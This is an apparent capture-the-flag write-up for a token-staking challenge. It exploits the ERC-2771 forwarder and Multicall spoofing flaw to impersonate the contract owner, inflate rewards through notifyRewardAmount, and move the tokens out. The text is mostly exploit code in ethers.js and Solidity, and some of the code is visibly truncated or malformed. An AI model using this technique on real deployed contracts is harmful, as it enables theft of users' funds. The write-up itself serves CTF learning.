You should stake your tokens to get more tokens!
We may find the goal of this challenge in the Challenge contract.
function isSolved() external view returns (bool) {
uint256 amazingNumber = 1128120030438127299645800;
return staking.earnedTotal() >= amazingNumber &&
staking.rewardsToken().balanceOf(address(0x123)) >= amazingNumber;
This challenge is related to the vulnerability when both Multicall
and ERC-2711
are implemented.
Unveiling the ERC-2771 Context and Multicall Vulnerability
We may craft spoofed calls to multicall(bytes[])
and modify the reward in Staking
Before attacking the contract, we may first approve
and deposit
our stakingToken
to the Staking
const stakingToken = await stakingContract.stakingToken();
const stakingTokenContract = await ethers.getContractAt("Token", stakingToken);
const stBalance = await stakingTokenContract.balanceOf(signer);
const approveTx = await stakingTokenContract.approve(stakingAddr, stBalance);
await approveTx.wait();
const stakeTx = await stakingContract.connect(signer).stake(stBalance);
await stakeTx.wait();
Next, we may wrap our spoofed calls and modify the reward.
const types = {
ForwardRequest: [
{ name: "from", type: "address" },
{ name: "to", type: "address" },
{ name: "value", type: "uint256" },
{ name: "gas", type: "uint256" },
{ name: "nonce", type: "uint256" },
{ name: "deadline", type: "uint256" },
{ name: "data", type: "bytes" },
const domain = {
name: "Forwarder",
version: "1",
chainId: await ethers.provider
.then((network) => network.chainId),
verifyingContract: fwderAddr,
const victim = await stakingContract.owner();
const data = {
from: signer.address,
to: stakingAddr,
value: 0n,
gas: 10_00_000n,
nonce: nonce,
data: stakingContract.interface.encodeFunctionData("multicall", [
// since the duration is 60
stakingContract.interface.encodeFunctionData("notifyRewardAmount", [
amazingNumber * 60n,
deadline: 99999999999999n,
const sign = await signer.signTypedData(domain, types, data);
const attackTx = await fwderContract.connect(signer).execute(data, sign);
await attackTx.wait();
Next, we may get our rewards and fullfil the first condition of this challenge
const getRtTx = await stakingContract.connect(signer).getReward();
await getRtTx.wait();
const earnTotoal = await stakingContract.earnedTotal();
if (earnTotoal < amazingNumber) {
console.log("Insufficient earnTotal.");
Finally, we need to send the rewardToken to address(0x123)
I am not sure how to do this with ethers.js
, so I just do this using a Sender
contract Sender {
Token public rewardToken;
constructor(address _token){
rewardToken = Token(_token);
function pwn() external {
uint256 amazingNumber = 1128120030438127299645800;
rewardToken.transferFrom(msg.sender, address(0x123), amazingNumber);